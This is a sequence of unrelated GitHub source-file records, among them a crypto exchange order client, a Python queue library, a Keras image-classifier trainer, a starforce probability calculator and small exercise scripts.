\"name=test_sar_api\" \\\n -F \"system_id=86\" \\\n -F \"deployment_id=23\" \\\n -F \"data=@controls/data/test_data/test_sar1.json\" \\\n localhost:8000/api/v1/systems/86/assessment/new\n \"\"\"\n\n # Prepare headers\n headers = {\n \"Authorization\": f\"{apikey}\"\n }\n\n # Set GovReady URL\n gr_api_url = f\"{GOVREADYHOST}/api/v1/systems/{system_id}/assessment/new\"\n\n print(SPACER)\n print(f\"Posting retrieved SAR to: {gr_api_url}\")\n\n # Post to GovReady\n req = request.Request( gr_api_url, data=data, headers=headers, method=\"POST\" )\n response = request.urlopen(req)\n body = response.read() # read once; a second read() would return b''\n\n print(SPACER)\n print(body)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"GovReady/govready-q","sub_path":"tools/simple_sar_server/sar_etl.py","file_name":"sar_etl.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"67"}
{"seq_id":"41678250984","text":"import os\nimport time\nimport hmac\nimport base64\nimport hashlib\nimport requests\nimport urllib.parse\nfrom binance import Client\nfrom binance.helpers import round_step_size\nfrom dotenv import load_dotenv, find_dotenv\nimport Constants as C\nload_dotenv(find_dotenv('config.env'))\n\n\nclass CEX:\n def create_pair(self, base, quote):\n return f'{base}{quote}'\n\n\nclass Kraken(CEX):\n def __init__(self, key=None, secret=None, test=False):\n super().__init__()\n self.key = key\n self.secret = secret\n self.test = test\n if not key:\n self.key = os.environ['KRAKEN_KEY']\n if not secret:\n self.secret = os.environ['KRAKEN_SECRET']\n self.api_url = 'https://api.kraken.com'\n self.version = '0'\n\n def get_signature(self, urlpath, data):\n postdata = urllib.parse.urlencode(data)\n encoded = 
(str(data['nonce']) + postdata).encode()\n message = urlpath.encode() + hashlib.sha256(encoded).digest()\n\n mac = hmac.new(base64.b64decode(self.secret), message, hashlib.sha512)\n sigdigest = base64.b64encode(mac.digest())\n return sigdigest.decode()\n\n def make_auth_req(self, uri_path, data={}):\n data['nonce'] = self.gen_nonce()\n headers = {}\n headers['API-Key'] = self.key\n # get_kraken_signature() as defined in the 'Authentication' section\n headers['API-Sign'] = self.get_signature(uri_path, data)\n response = requests.post(\n (self.api_url + uri_path),\n headers=headers,\n data=data\n )\n return self.handle_response(response)\n\n def gen_nonce(self):\n return str(int(1000 * time.time()))\n\n def get_balance(self):\n access = 'private'\n endpoint = 'Balance'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n response = self.make_auth_req(url)\n for asset in response:\n response[asset] = float(response[asset])\n return response\n\n def get_asset_pair(self, pair):\n access = 'public'\n endpoint = 'AssetPairs'\n parts = [\n self.api_url,\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n params = {\n 'pair': pair\n }\n response = requests.get(url, params=params)\n result = self.handle_response(response)[pair]\n return result\n\n def order(self, base, quote, side, spend_ratio=1, test=False):\n pair = self.create_pair(base, quote)\n pair_info = self.get_asset_pair(pair)\n fee = self.get_fee(pair) / 100\n spend_ratio = spend_ratio - fee\n side = side.lower()\n access = 'private'\n endpoint = 'AddOrder'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n\n oflags = ['nompp']\n balance_label = base\n precision_label = 'lot_decimals'\n\n if side.upper() == C.BUY:\n oflags.append('viqc')\n balance_label = quote\n precision_label = 'cost_decimals'\n elif side.upper() != C.SELL:\n raise Exception('Need to specify BUY or SELL side for order')\n\n balance = self.get_balance()[balance_label]\n amount = spend_ratio * balance\n precision = pair_info[precision_label]\n volume = \"{:0.0{}f}\".format(amount, precision)\n\n data = {\n 'ordertype': 'market',\n 'type': side.lower(),\n 'pair': pair,\n 'oflags': ','.join(oflags),\n 'volume': volume,\n 'validate': test or self.test\n }\n response = self.make_auth_req(url, data)\n return response\n\n def handle_response(self, response):\n response = response.json()\n error = response['error']\n if error:\n raise Exception(error)\n return response['result']\n\n def get_order(self, order_id):\n access = 'private'\n endpoint = 'QueryOrders'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n data = {\n 'txid': order_id,\n 'trades': True\n }\n response = self.make_auth_req(url, data)\n order = response[order_id]\n order['order_id'] = order_id\n return order\n\n def get_trades(self, trade_ids):\n access = 'private'\n endpoint = 'QueryTrades'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n data = {\n 'txid': ','.join(trade_ids),\n 'trades': True\n }\n response = self.make_auth_req(url, data)\n trades = [\n {\n **response[trade_id],\n **{'trade_id': trade_id}\n }\n for trade_id in trade_ids\n ]\n return trades\n\n def standardize_order(self, order, trades):\n std = {}\n std['symbol'] = order['descr']['pair']\n std['orderId'] = order['order_id']\n std['transactTime'] = int(\n (order['closetm'] + order['opentm']) / 2 * 1000)\n std['price'] = round(float(order['price']), 10)\n side = 
order['descr']['type'].upper()\n origQty = float(order['vol'])\n if side == C.BUY:\n # other test would be [if 'viqc' in order['oflags'].split(','):]\n origQty = round(origQty / std['price'], 10)\n std['origQty'] = origQty\n std['executedQty'] = float(order['vol_exec'])\n std['cummulativeQuoteQty'] = round(\n std['price'] * std['executedQty'], 10)\n std['status'] = order['status'].upper()\n std['type'] = order['descr']['ordertype'].upper()\n std['side'] = side\n\n def standardize_trade(trade):\n std_trade = {}\n std_trade['price'] = str(round(float(trade['price']), 10))\n std_trade['qty'] = trade['vol']\n std_trade['commission'] = trade['fee']\n std_trade['tradeId'] = trade['trade_id']\n return std_trade\n fills = [standardize_trade(trade) for trade in trades]\n std['fills'] = fills\n return std\n\n def get_test_side(self, base, quote):\n pair = f'{base}{quote}'\n balances = self.get_balance()\n base_bal = balances[base]\n quote_bal = balances[quote]\n price = self.get_price(pair)\n base_val = base_bal * price\n side = 'buy' if quote_bal > base_val else 'sell'\n return side\n\n def get_fee(self, pair):\n access = 'private'\n endpoint = 'TradeVolume'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n data = {\n \"pair\": pair\n }\n response = self.make_auth_req(url, data)\n fee = float(response['fees'][pair]['fee'])\n return fee\n\n def get_ticker(self, pair=None):\n access = 'public'\n endpoint = 'Ticker'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n data = {\n \"pair\": pair\n } if pair else {}\n response = self.make_auth_req(url, data)\n return response\n\n def get_price(self, pair):\n ticker = self.get_ticker(pair)\n price = float(ticker[pair]['c'][0])\n return price\n\n\nclass Binance(CEX):\n def __init__(self, key=None, secret=None, testnet=False):\n super().__init__()\n self.key = key\n self.secret = secret\n if not key:\n if testnet:\n self.key = os.environ['BINANCE_TESTNET_KEY']\n else:\n self.key = os.environ['BINANCE_KEY']\n if not secret:\n if testnet:\n self.secret = os.environ['BINANCE_TESTNET_SECRET']\n else:\n self.secret = os.environ['BINANCE_SECRET']\n self.client = Client(self.key, self.secret, testnet=testnet, tld='us')\n\n def order(self, base, quote, side, spend_ratio=1, test=False):\n # fee is 0.1%, so max spend_ratio is 99.9%\n spend_ratio = spend_ratio - C.BINANCE_FEE\n pair = self.create_pair(base, quote)\n side = side.upper()\n order_type = self.client.ORDER_TYPE_MARKET\n params = {'symbol': pair, 'type': order_type}\n symbol_info = self.client.get_symbol_info(pair)\n\n if side == C.SELL:\n side = self.client.SIDE_SELL\n balance_label = base\n quantity_label = 'quantity'\n filters = symbol_info['filters']\n for filter in filters:\n if filter['filterType'] == 'LOT_SIZE':\n step_size = float(filter['stepSize'])\n elif side == C.BUY:\n side = self.client.SIDE_BUY\n balance_label = quote\n quantity_label = 'quoteOrderQty'\n precision = int(symbol_info['quoteAssetPrecision'])\n else:\n raise Exception('Need to specify BUY or SELL side for order')\n\n balance = float(self.client.get_asset_balance(balance_label)['free'])\n amount = spend_ratio * balance\n\n if side == C.BUY:\n quantity = \"{:0.0{}f}\".format(amount, precision)\n else:\n quantity = round_step_size(amount, step_size)\n\n params[quantity_label] = quantity\n\n params['side'] = side\n fx = self.client.create_test_order if test else self.client.create_order\n\n order = fx(**params)\n return order\n\n# write script that gets most recent 
data at 9pm est\n# predicts using model\n# writes that back to predict.csv\n# write successful orders to binance.csv\n","repo_name":"suchak1/hyperdrive","sub_path":"hyperdrive/Exchange.py","file_name":"Exchange.py","file_ext":"py","file_size_in_byte":9884,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"67"}
{"seq_id":"29691454966","text":"import sys\nimport time\n\nclass Queue():\n\n # Initialize\n def __init__(self, elements, visualize):\n\n start_time = time.time()\n\n self.size = len(elements)\n self.elements = elements\n \n # Settings\n self.visualize = visualize\n self.visualize_count = 0\n self.set_maximum_size = float('INF')\n self.set_allow_str = True\n\n end_time = time.time()\n time_taken = end_time - start_time\n\n if self.visualize:\n self.display_visualize_message(\"Queue has been created with the elements: \" + str(elements), time_taken)\n \n\n def __str__(self):\n return str(self.elements)\n\n def __repr__(self):\n return str(self.elements)\n\n def display_visualize_message(self, message, time_taken=None):\n self.visualize_count += 1\n print(self.visualize_count, \" - \" , message)\n for index, element in enumerate(self.elements):\n if self.size == 1:\n print(\"Front <- | \", end = \"\")\n print(str(element), end = \"\")\n print(\" | <- Rear\", end = \"\")\n print()\n elif index == 0:\n print(\"Front <- | \", end = \"\")\n print(str(element), end = \"\")\n elif index == self.size - 1:\n print(\" | \" + str(element), end = \"\")\n print(\" | <- Rear\", end = \"\")\n print()\n else:\n print(\" | \" + str(element), end = \"\")\n\n print(\"Memory Usage: \" + str(sys.getsizeof(self.elements)))\n if time_taken is not None:\n print(\"Time Taken: \" + str(time_taken))\n\n # Settings of the queue\n def set(\n self,\n visualize = False,\n maximum_size = float('INF'),\n allow_str = True\n ):\n self.visualize = visualize\n self.set_maximum_size = maximum_size\n self.set_allow_str = allow_str\n \n # Find the element on the index\n def index(self, position):\n if(position >= self.size or position < 0):\n print(\"Index out of Range\")\n else:\n\n if self.visualize:\n # no timing is measured here, so time_taken is omitted\n self.display_visualize_message(\"Element at the position: \" + str(position) + \" is \" + str(self.elements[position]))\n\n return self.elements[position]\n \n # Find the index of the element\n def find(self, element):\n try:\n\n start_time = time.time()\n position = self.elements.index(element)\n end_time = time.time()\n time_taken = end_time - start_time\n\n if self.visualize:\n self.display_visualize_message(\"The element \" + str(element) + \" is found at the position: \" + str(position), time_taken)\n\n except ValueError:\n print(\"Value not present.\")\n position = -1\n \n return position\n\n # Add the element to the queue\n def add(self, position = -1, element = None):\n\n start_time = time.time()\n\n # CHECK SETTINGS\n # Maximum size\n if(self.set_maximum_size != float('INF')):\n if(self.size >= self.set_maximum_size):\n return \"Maximum size exceeded.\"\n \n # Allow Str\n if(not self.set_allow_str):\n if(isinstance(element, str)):\n return \"String is not allowed.\"\n\n # If no element is given, but position is given, then take position as element\n if(element == None and position!=-1):\n element = position\n position = self.size\n elif(element == None):\n print('Please pass the element to insert.')\n return None\n\n # If no position is given, add it to the last\n if(position == -1):\n position = self.size\n\n if(self.size == 0):\n self.elements = [0] * position\n self.elements.append(element)\n 
else:\n if(position > self.size):\n self.elements += [0] * (position - self.size)\n self.elements.append(element)\n self.size += (position - self.size) \n else:\n self.elements.insert(position, element)\n\n self.size += 1\n\n end_time = time.time()\n time_taken = end_time - start_time\n\n if self.visualize and element is not None:\n self.display_visualize_message(\"The element \" + str(element) + \" is inserted in the position: \" + str(position), time_taken)\n\n\n # Add the element in the position and remove the other element\n def add_and_remove(self, position = -1, element = None):\n\n # If no element is given\n if(element == None):\n print('Please pass the element to insert.')\n return None\n\n # If no position is given, add it to the last\n if(position == -1):\n position = self.size\n\n if(self.size == 0):\n self.elements = [0] * position\n self.elements.append(element)\n self.size = position + 1\n else:\n if(position < self.size):\n # replace in place; the size does not change\n del self.elements[position]\n self.elements.insert(position, element)\n else:\n self.elements += [0] * (position - self.size)\n self.elements.append(element)\n self.size = position + 1\n\n\n def add_first(self, element):\n self.add(0, element)\n\n def add_last(self, element):\n self.add(self.size, element)\n\n # Remove the element from the queue\n def remove(self, position = 0):\n if(position >= self.size or position < 0):\n print(\"Index Out of Range\")\n return -1\n else:\n element_to_return = self.elements[position]\n self.elements.pop(position)\n self.size -= 1\n\n return element_to_return\n\n def remove_first(self):\n return self.remove(0)\n\n def remove_last(self):\n return self.remove(self.size - 1)\n\n def display(self):\n print(self.elements)\n\n def get_elements(self):\n return self.elements\n \n def get_size(self):\n return self.size\n\n # Get the maximum element from the queue\n def get_max(self):\n maximum_value = -float('INF')\n for element in self.elements:\n if(isinstance(element, int)):\n if(element > maximum_value):\n maximum_value = element\n if(maximum_value == -float('INF')):\n maximum_value = \"No integer is present.\"\n return maximum_value\n \n # Get the minimum element from the queue\n def get_min(self):\n minimum_value = float('INF')\n for element in self.elements:\n if(isinstance(element, int)):\n if(element < minimum_value):\n minimum_value = element\n if(minimum_value == float('INF')):\n minimum_value = \"No integer is present.\"\n return minimum_value\n\n # Get the sum of all the elements from the queue\n def get_sum(self):\n sum_value = 0\n for element in self.elements:\n if(isinstance(element, int)):\n sum_value += element\n return sum_value\n\n # Get the average of all the elements from the queue\n def get_avg(self):\n sum_value = 0\n count_value = 0\n for element in self.elements:\n if(isinstance(element, int)):\n sum_value += element\n count_value += 1\n avg_value = 0\n if(count_value != 0):\n avg_value = sum_value/count_value\n return avg_value\n\n # Reverse the queue\n def reverse(self, inplace = False):\n reversed_elements = []\n for element in self.elements[::-1]:\n reversed_elements.append(element)\n if(inplace):\n self.elements = reversed_elements\n return reversed_elements\n\n # Sort the queue\n def sort(self, desc = False, inplace = False):\n sorted_elements = []\n sorted_numbers = []\n sorted_strings = []\n for element in self.elements:\n if(isinstance(element, int)):\n sorted_numbers.append(element)\n elif(isinstance(element, str)):\n sorted_strings.append(element)\n else:\n pass\n sorted_numbers = sorted(sorted_numbers)\n sorted_strings = sorted(sorted_strings)\n sorted_elements.extend(sorted_numbers)\n 
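# Editor's note: numbers and strings are sorted and concatenated separately\n # because Python 3 cannot compare int and str; numeric values therefore\n # always precede strings in the result.\n 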
sorted_elements.extend(sorted_strings)\n # Convert to descending\n if(desc):\n sorted_elements = list(reversed(sorted_elements))\n if(inplace):\n self.elements = sorted_elements\n return sorted_elements\n\n # Map all the values to the function\n def map(self, function = None, inplace = False):\n if(not function):\n print(\"Function parameter is missing.\")\n return None\n mapped_elements = []\n for element in self.elements:\n value = function(element)\n mapped_elements.append(value)\n if(inplace):\n self.elements = mapped_elements\n return mapped_elements\n\n\n# CREATE A QUEUE\ndef queue(elements = [], visualize = False):\n return Queue(elements, visualize)","repo_name":"fazil2003/easydsi","sub_path":"easydsi/queue/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"41845507193","text":"#!/usr/bin/python2.7\n# encoding: utf-8\nfrom __future__ import division\n\nimport os \nimport cPickle as pkl\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main(input_dir):\n\n #Gridded data\n #in space\n #xmax = 2000.0\n #xmin = 0.0\n #Dx = 200\n #ymax = 1000\n #ymin = 0.0\n #Dy = 100\n \n #high density\n xmax = 1500.0\n xmin = 0.0\n Dx = 20\n ymax = 230\n ymin = 0.0\n Dy = 20\n \n x = np.linspace(xmin, xmax, (xmax-xmin)//Dx)\n y = np.linspace(ymin, ymax,(ymax-ymin)// Dy)\n X, Y = np.meshgrid(x, y)\n #and time\n tmax = 12.0*60*60\n tmin = 0.0\n Dt = 300\n t = np.linspace(tmin, tmax, Dt)\n period = tmax\n \n umax = 3.1\n vmax = 0.0\n sshmax = 1.0\n \n #time dependent\n #phase = np.pi/2.0\n #U = np.ones((t.shape[0],X.shape[0],X.shape[1]))\n #V = np.ones((t.shape[0],Y.shape[0],Y.shape[1]))\n #SSH = np.ones((t.shape[0],Y.shape[0],Y.shape[1]))\n #I = 0\n #for i in t:\n # U[I,:,:] = umax * np.cos(2.0*np.pi*(i/period))\n # V[I,:,:] = vmax * np.cos(2.0*np.pi*(i/period))\n # SSH[I,:,:] = sshmax * np.cos(2.0*np.pi*(i/period)+phase)\n # I += 1 \n \n #time independent\n #V = np.ones(X.shape)\n #for i in range(X.shape[0]):\n # V[i,:] = vmax * np.cos(2.0*np.pi*(i/(X.shape[0]/2.0)))\n V = vmax * np.ones(X.shape)\n \n #U = np.ones(Y.shape)\n #for i in range(Y.shape[0]):\n # U[i,:] = umax * np.cos(2.0*np.pi*(i/Y.shape[0]))\n U = umax * np.ones(Y.shape)\n \n SSH = sshmax * np.ones(Y.shape)\n \n #Plot quiver\n# plt.figure()\n# #Q = plt.quiver(X, Y, U[0,:,:], V[0,:,:], scale=100.0)\n# Q = plt.quiver(X, Y, U, V, scale=100.0)\n# #plt.figure() \n# #P1 = plt.plot(t, U[:,0,0].T)\n# #P2 = plt.plot(t, SSH[:,0,0].T)\n# plt.show()\n \n ##Default values\n #Bathymetry\n bathy = -60.0 * np.ones(X.shape)\n #Turbulence intensity\n ti = 0.05 * np.ones(X.shape)\n \n #Save as pickle\n data = {}\n data['TI'] = ti\n data['X'] = x\n data['Y'] = y\n data['U'] = U\n data['V'] = V\n data['SSH'] = SSH\n data['bathy'] = bathy\n fpath = os.path.join(input_dir, 'simple_inputs.p')\n f = file(fpath, 'wb')\n pkl.dump(data, f, protocol=pkl.HIGHEST_PROTOCOL)\n f.close()\n\nif __name__ == '__main__':\n \n input_dir = 'inputs_tidal'\n main(input_dir)","repo_name":"DTOcean/dtocean-hydrodynamics","sub_path":"examples/make_analytical_inputs.py","file_name":"make_analytical_inputs.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"27367149779","text":"\"\"\"Train MLP Model\nUsing MLP Model to Train Picture Recognition Model.\n\"\"\"\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom 
keras.layers import Dense, Dropout\n\nimport numpy as np\n\n\n# Set the np random seed\nnp.random.seed(10)\n\n# Load the training dataset\nn = 10000\nimg_feature = np.fromfile(\"./your/image/training/array.features\", dtype=np.uint8)\nimg_feature = img_feature.reshape(n, 30, 30, 3)\nimg_label = np.fromfile(\"./your/image/training/array.labels\", dtype=np.uint8)\nimg_label = img_label.reshape(n, 1)\n\n# Shuffle the dataset\nindexs = np.random.permutation(img_label.shape[0])\nrand_img_feature = img_feature[indexs]\nrand_img_label = img_label[indexs]\n\n# Normalize the data\n# Converting the features to floats in 0~1 speeds up convergence and improves prediction accuracy\n# Reshape (n,30,30,3) => (n, 30*30*3), then divide by 255\nimg_feature_normalized = rand_img_feature.reshape(n, 30*30*3).astype('float32') / 255\n\n# Convert the labels to a one-hot representation\nimg_label_onehot = np_utils.to_categorical(rand_img_label)\n\n# Build a linear stack (sequential) model\nmodel = Sequential()\n\n# Build the input and hidden layers\nmodel.add(Dense(input_dim = 30*30*3, # number of input-layer neurons\n                units = 1000, # number of hidden-layer neurons\n                kernel_initializer = 'normal', # weight/bias initialization: normal distribution\n                activation = 'relu')) # activation: relu, which zeroes out negative values\n\n# Build the output layer\nmodel.add(Dense(units = 2, # number of output-layer neurons (i.e. [True, False])\n                kernel_initializer = 'normal',\n                activation = 'softmax')) # activation: softmax, so outputs lie between 0 and 1\n\n# Define how the model is trained\nmodel.compile(loss='categorical_crossentropy', # loss function\n              optimizer='adam', # optimizer\n              metrics=['accuracy']) # evaluation metric: accuracy\n\n# Show the model summary\nprint(model.summary())\n\n# Start training the model\ntrain_history = model.fit(x=img_feature_normalized, # features\n                          y=img_label_onehot, # labels \n                          validation_split=0.2, # 80% train, 20% validation\n                          epochs=5, # run 5 training epochs\n                          batch_size=200, # mini-batches of 200 samples\n                          verbose=2) # show training progress\n\n# Save the model\nmodel.save(\"./your/image/training/models.dat\")","repo_name":"yehuh/ImageRecognizer","sub_path":"Train_Image.py","file_name":"Train_Image.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29862060152","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\narr = deque([i + 1 for i in range(N)])\nlocation = list(map(int, input().split()))\ncnt = 0\n\nfor loc in location:\n    while True:\n        index = arr.index(loc)\n        mid_index = len(arr) // 2\n\n        if index <= mid_index:\n            if arr[0] == loc:\n                arr.popleft()  # operation 1\n                break\n            else:\n                arr.append(arr.popleft())  # operation 2\n                cnt += 1\n\n        else:\n            if arr[-1] == loc:\n                arr.pop()  # operations 1 + 3\n                cnt += 1\n                break\n\n            else:\n                arr.appendleft(arr.pop())  # operation 3\n                cnt += 1\n\nprint(cnt)\n","repo_name":"Sora-CodingTestStudy/our-code","sub_path":"queue/yoona/회전하는_큐.py","file_name":"회전하는_큐.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
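The rotating-queue solution above moves one element per step; `collections.deque.rotate` expresses the whole left or right rotation in a single call. A compact equivalent sketch, with the same input format assumed:

from collections import deque

def min_rotations(n, targets):
    arr = deque(range(1, n + 1))
    cnt = 0
    for loc in targets:
        idx = arr.index(loc)
        cnt += min(idx, len(arr) - idx)  # cheaper of rotating left vs right
        arr.rotate(-idx)                 # bring loc to the front either way
        arr.popleft()
    return cnt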
 +{"seq_id":"16534178083","text":"# def square(number):\n#     sqr_num = number * number\n#     return sqr_num\n\n# def add_two_numbers(num1, num2):\n#     sum = num1 + num2\n#     return sum\n\n# def cube(num):\n#     return num ** 3\n\n# print(cube(3))\n\n\n# def multiply(num1, num2):\n#     return num1 * num2\n\n# print(multiply(2,5))\n\n''' while loop '''\n# n = 1\n# while (n < 5):\n#     print('n =', n)\n#     n = n + 1\n# print('loop finished')\n\n# for n in range(1, 5):\n#     print('n =', n)\n\n# print('loop finished')\n\n\n# for n in range(1,4):\n#     for j in ['a', 'b', 'c']:\n#         print('n = {}'.format(n), 'and j = {}'.format(j))\n\n# for n in range(2,11):\n#     print(n)\n\n# n = 2\n# while n < 11:\n#     print(n)\n#     n += 1\n\n# def doubles(num):\n#     for n in range(1,4):\n#         num = num * 2\n#         print(num)\n#     return num\n\n# print(doubles(2))\n\n# print(1 <= 1)\n# #True\n# print(1 != 1)\n# #False\n# print(1 != 2)\n# #True\n# print('good' != 'bad')\n# #True\n# print('good' != 'Good')\n# #True\n# print(123 == '123')\n# #False\n\n\n# def cube(num):\n#     return num **c\n\n\n# Renamed from `input` so the built-in input() is not shadowed\ndef check_word_length(word):\n    stored_word = str(word)\n    if len(stored_word) < 5:\n        print('word is less than 5 letters')\n    elif len(stored_word) == 5:\n        print('word has 5 letters')\n    else:\n        print('word has more than 5 letters')\n\ncheck_word_length('turkey')\n","repo_name":"winniecluk/RealPythonExercises","sub_path":"exercises2.py","file_name":"exercises2.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30242280966","text":"import pandas as pd\nimport numpy as np\n\nclass StarforceCalculator:\n    def __init__(self, start = 0, end = 30, \n                 scroll = None, ward = None, lucky = None, click = None):\n        # 30 >= end > start >= 0\n        # scroll, ward, lucky have to be lists if provided\n        self.start = start\n        self.end = end\n        \n        self.scroll = [bool(s) for s in scroll] if scroll is not None else scroll\n        self.ward = [bool(s) for s in ward] if ward is not None else ward\n        self.lucky = [bool(s) for s in lucky] if lucky is not None else lucky\n        self.click = [bool(s) for s in click] if click is not None else click\n        \n        self.table = None\n        \n        \n    def create_table(self):\n        starforce_state = list(range(31)) \n        #must add 20 more states (destroyed states)\n        \n        increase = np.array([100 - i*5 for i in range(20)] + [1]*10)/100 \n        decrease = np.array([0]*10 + [10,10,15,15,20,20,25,25,30,30]+ [40]*5 + [45]*5)/100\n        destroy = np.array([0]*10 + [5]*10 + [10]*5 + [15]*5)/100\n        if self.click is not None:\n            increase = np.minimum(np.array(self.click)*0.05 + increase,1)\n        if self.lucky is not None:\n            increase = np.minimum(np.array(self.lucky)*0.1 + increase,1)\n        \n        \n        same = 1 - increase - decrease - destroy\n        cost = np.array([0.01,0.015,0.03,0.055,0.1,0.18,0.27,0.36,0.45,0.54,\n                        0.56,0.64,0.72,0.8,1.2,1.6,2,2.4,2.8,3.2,3.6,\n                        4,4.8,5.6,6.4,8.1,9,13.5,18,20.7])\n        table = pd.DataFrame(list(zip(starforce_state,increase,\n                            same,decrease,destroy,cost)))\n        table.columns = ['state','increase','same','decrease','destroy','cost']\n\n        if self.scroll is not None:\n            table.loc[self.scroll,'same'] = table.iloc[self.scroll]['decrease'] + table.iloc[self.scroll]['same']\n            table.loc[self.scroll,'decrease'] = 0\n        if self.ward is not None:\n            table.loc[self.ward,'same'] = table.iloc[self.ward]['destroy'] + table.iloc[self.ward]['same']\n            table.loc[self.ward,'destroy'] = 0\n        #now we have to restrict based on start and end\n        table = table[(table['state'] < self.end) & (table[\"state\"] >= min(self.start, 9))]\n        \n        self.table = table\n        \n    def transient(self):\n        part1 = np.diag(self.table['increase'].values[:-1],1)\n        part1 += np.diag(self.table['same'].values + self.table['destroy'].values)\n        part1 += np.diag(self.table['decrease'].values[1:],-1)\n        self.TMatrix = part1\n\n    def get_counts(self):\n        Cinv = np.eye(self.TMatrix.shape[0])-self.TMatrix\n        \n        b = np.zeros(self.TMatrix.shape[0])\n        b[max(self.start-9, 0)] = 1\n        self.CMatrix = np.linalg.solve(Cinv.T, b) \n        \n        \n    def get_state_counts(self):\n        tol = 1e-5\n        self.CMatrix = self.CMatrix * (np.abs(self.CMatrix) > tol)\n        if self.start < 10:\n            self.NScount = self.CMatrix[:(self.end-self.start)]\n            self.DScount = self.CMatrix[(self.end-self.start):]\n        else:\n            self.NScount = self.CMatrix[:(self.end-min(9,self.start))]\n            self.DScount = self.CMatrix[(self.end-min(9,self.start)):]\n\n        self.table['Num Visits'] = list(np.round(self.NScount,2))\n        
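The `transient` plus `get_counts` pair above is the textbook absorbing-Markov-chain computation: with Q the transition matrix restricted to transient states, the expected visit counts n starting from state s satisfy (I - Q)^T n = e_s, which is exactly what the `np.linalg.solve(Cinv.T, b)` call solves. A self-contained toy example of the same linear solve (made-up probabilities, not game data):

import numpy as np

# Toy substochastic matrix: each row leaks some probability to an implicit
# absorbing state, so I - Q is invertible.
Q = np.array([[0.0, 0.6, 0.0],
              [0.3, 0.0, 0.5],
              [0.0, 0.4, 0.0]])
b = np.zeros(3)
b[0] = 1.0  # start in state 0
expected_visits = np.linalg.solve((np.eye(3) - Q).T, b)
print(expected_visits)  # expected number of visits to each transient state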
self.table['Num Destroyed'] = np.round(self.table['destroy'] * self.table['Num Visits'],2)\n self.table['Total Cost(M)'] = np.round(self.table['cost'] * self.table['Num Visits'],2)\n \n def print_results(self):\n print(self.table)\n","repo_name":"SLSC94/StarforceCalculator","sub_path":"StarforceCalculator.py","file_name":"StarforceCalculator.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30444332239","text":"\"\"\" Tests for our mutable JSON column type. \"\"\"\n\nfrom datetime import datetime\n\nACCOUNT_ID = 1\n\n\ndef test_mutable_json_type(db, config):\n \"\"\"\n Test that FolderSync._sync_status which is a mutable JSON column is\n updated as expected.\n\n \"\"\"\n from inbox.models.account import Account\n from inbox.models.backends.imap import ImapFolderSyncStatus\n\n account = db.session.query(Account).get(ACCOUNT_ID)\n\n sync_status = db.session.query(ImapFolderSyncStatus).filter_by(\n account_id=ACCOUNT_ID, folder_id=account.inbox_folder_id).one()\n\n original_metrics = sync_status.metrics\n\n metrics = dict(download_uid_count=10,\n queue_checked_at=datetime.utcnow())\n sync_status.update_metrics(metrics)\n\n updated_metrics = sync_status.metrics\n\n metrics.update(original_metrics)\n assert updated_metrics != original_metrics and updated_metrics == metrics,\\\n 'metrics not updated correctly'\n\n # Reupdate status\n new_metrics = dict(delete_uid_count=50,\n download_uid_count=100,\n queue_checked_at=datetime.utcnow())\n sync_status.update_metrics(new_metrics)\n\n latest_metrics = sync_status.metrics\n\n metrics.update(new_metrics)\n assert latest_metrics == metrics, 'metrics not re-updated correctly'\n","repo_name":"PriviPK/privipk-sync-engine","sub_path":"tests/general/test_mutable_json_type.py","file_name":"test_mutable_json_type.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"251656643","text":"from client import client\r\nimport threading\r\ngrupos = []\r\n\r\ndef hand_shake_point_2_point(username_of_the_users:list[str],client_send:client,clients:list,group_name:str,signature:str):\r\n lock = threading.Lock()\r\n lock.acquire()\r\n\r\n grupos.append((group_name,username_of_the_users))\r\n #print(grupos)\r\n lock.release()\r\n other_clients = list(filter(lambda x: x.name in username_of_the_users,clients))\r\n #print(list(map(lambda x:\"ONLINE: \"+ x.name,other_clients)))\r\n for o_client in other_clients:\r\n #print(\"ola\")\r\n try:\r\n #print(o_client.encrypt_mesages[1])\r\n #print(client_send.encrypt_mesages[1])\r\n #print(client_send.socket_info)\r\n \r\n client_send.socket_info.send(f\"startHAND{group_name}.|||.{o_client.encrypt_mesages[1]}.|||.{signature}\".encode())\r\n #client_send.socket_info.send(\"ola\".encode())\r\n #print(\"b\")\r\n msg = client_send.socket_info.recv(3072).decode() + f\".|||.{client_send.sign_mesages[1]}\" \r\n #print(f\"{msg} <- ENVIADO\")\r\n #print(o_client.name)\r\n o_client.send_message(msg.encode())\r\n #print(\"enviado\")\r\n except Exception as e:\r\n print(e.args)\r\n \r\n\r\ndef 